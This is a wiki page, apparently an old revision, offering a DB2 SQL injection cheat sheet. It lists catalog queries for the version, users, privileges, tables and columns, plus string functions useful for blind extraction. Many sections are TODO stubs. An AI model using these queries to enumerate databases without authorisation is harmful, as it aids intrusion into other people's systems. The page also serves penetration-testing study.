Wiki

User Tools

Site Tools

Trace: interfaces sql_injection_cheat_sheet_db2
hacking:sql_injection_cheat_sheet_db2

This is an old revision of the document!

Hacking - SQL Injection Cheat Sheet (DB2)

Version 

select versionnumber, version_timestamp from sysibm.sysversions;

Comments select blah from foo; – comment like this Current User 

select user from sysibm.sysdummy1;

select session_user from sysibm.sysdummy1; select system_user from sysibm.sysdummy1; List Users

N/A (I think DB2 uses OS-level user accounts for authentication.)

Database authorities (like roles, I think) can be listed like this: select grantee from syscat.dbauth; List Password Hashes 

N/A (I think DB2 uses OS-level user accounts for authentication.)

List Privileges select * from syscat.tabauth; – privs on tables select * from syscat.dbauth where grantee = current user; select * from syscat.tabauth where grantee = current user; List DBA Accounts TODO Current Database select current server from sysibm.sysdummy1; List Databases SELECT schemaname FROM syscat.schemata; List Columns 

select name, tbname, coltype from sysibm.syscolumns;

List Tables select name from sysibm.systables; Find Tables From Column Name TODO Select Nth Row select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only; Select Nth Char 

SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1;  -- returns b

Bitwise AND 

This page seems to indicate that DB2 has no support for bitwise operators!

ASCII Value → Char 

select chr(65) from sysibm.sysdummy1; -- returns 'A'

Char → ASCII Value select ascii('A') from sysibm.sysdummy1; – returns 65 Casting SELECT cast('123' as integer) FROM sysibm.sysdummy1; SELECT cast(1 as char) FROM sysibm.sysdummy1; String Concatenation SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; – returns 'abc' select 'a' || 'b' from sysibm.sysdummy1; – returns 'ab'

If Statement 

TODO

Case Statement TODO Avoiding Quotes 

TODO

Time Delay 

???

See Heavy Queries article for some ideas. Make DNS Requests TODO Command Execution TODO Local File Access 

TODO

Hostname, IP Address TODO Location of DB files 

TODO

Default/System Databases 

TODO

References

https://www.michaelboman.org/books/sql-injection-cheat-sheet-db2

hacking/sql_injection_cheat_sheet_db2.1585735946.txt.gz · Last modified: 2020/07/15 09:30 (external edit)
Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki